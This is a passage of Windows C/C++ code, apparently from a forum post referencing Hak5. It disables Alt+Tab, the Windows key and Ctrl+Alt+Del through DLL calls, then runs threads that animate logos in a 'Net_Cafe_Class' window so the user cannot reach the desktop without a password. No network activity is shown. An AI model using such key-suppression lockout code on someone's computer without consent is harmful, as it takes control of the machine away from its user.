(AntiAltTab)GetProcAddress(WLock, "AltTab2_Enable_Disable"); WinKey = (AntiWinKey)GetProcAddress(WLock, "TaskSwitching_Enable_Disable"); CtrlAltDel = (AntiCtrlAltDelete)GetProcAddress(WLock, "CtrlAltDel_Enable_Disable"); AltTab(hWndX, 0); // disable alt tab WinKey(0); // diable windows key CtrlAltDel(0); // disable ctrl+alt+delete // Now theres not a single way to get to the windows desktop without knowing the password!;) // lol yeah rite.. CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&amp;GenerateHak5Logos, 0, 0, 0); CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&amp;MoveLogos, 0, 0, 0); CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&amp;KeyPresses, 0, 0, 0); CreateThread(0, 0, (LPTHREAD_START_ROUTINE)&amp;RenderThread, 0, 0, 0); MSG msg; ZeroMemory(&amp;msg, sizeof(msg)); for(;; Sleep(10)) { if(PeekMessage(&amp;msg, NULL, 0U, 0U, PM_REMOVE)) { TranslateMessage(&amp;msg); DispatchMessage(&amp;msg); } } return msg.wParam; } LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam) { switch (message) { case WM_MOUSEMOVE: SetCursor(LoadCursor(0, IDC_ARROW)); break; default: return DefWindowProc(hWnd, message, wParam, lParam); } return 0; } HRESULT InitWindow() { WNDCLASSEX wc = {sizeof(WNDCLASSEX), CS_CLASSDC, WndProc, 0L, 0L, GetModuleHandle(NULL), LoadIcon(hInst, MAKEINTRESOURCE(101)), NULL, NULL, NULL, L"Net_Cafe_Class", NULL}; RegisterClassEx(&amp;wc); DWORD dwFrameWidth = GetSystemMetrics(SM_CXSIZEFRAME); DWORD dwFrameHeight = GetSystemMetrics(SM_CYSIZEFRAME); DWORD dwMenuHeight = GetSystemMetrics(SM_CYMENU); DWORD dwCaptionHeight = GetSystemMetrics(SM_CYCAPTION); DWORD dwWindowWidth = WINDOW_WIDTH + dwFrameWidth * 2; DWORD dwWindowHeight = WINDOW_HEIGHT + dwFrameHeight * 2 + dwMenuHeight + dwCaptionHeight; // Create the application's window. hWndX = CreateWindowA( "Net_Cafe_Class", "cafe'", WS_SIZEBOX|WS_OVERLAPPED|WS_CAPTION|WS_SYSMENU|WS_MINIMIZEBOX|WS_CLIPSIBLIN GS|WS_VISIBLE, CW_USEDEFAULT, CW_USEDEFAULT, dwWindowWidth, dwWindowHeight, GetDesktopWindow(), NULL, wc.hInstance, NULL ); if(hWndX == NULL) { return(E_FAIL); } return(S_OK); }
×
×
  • Create New...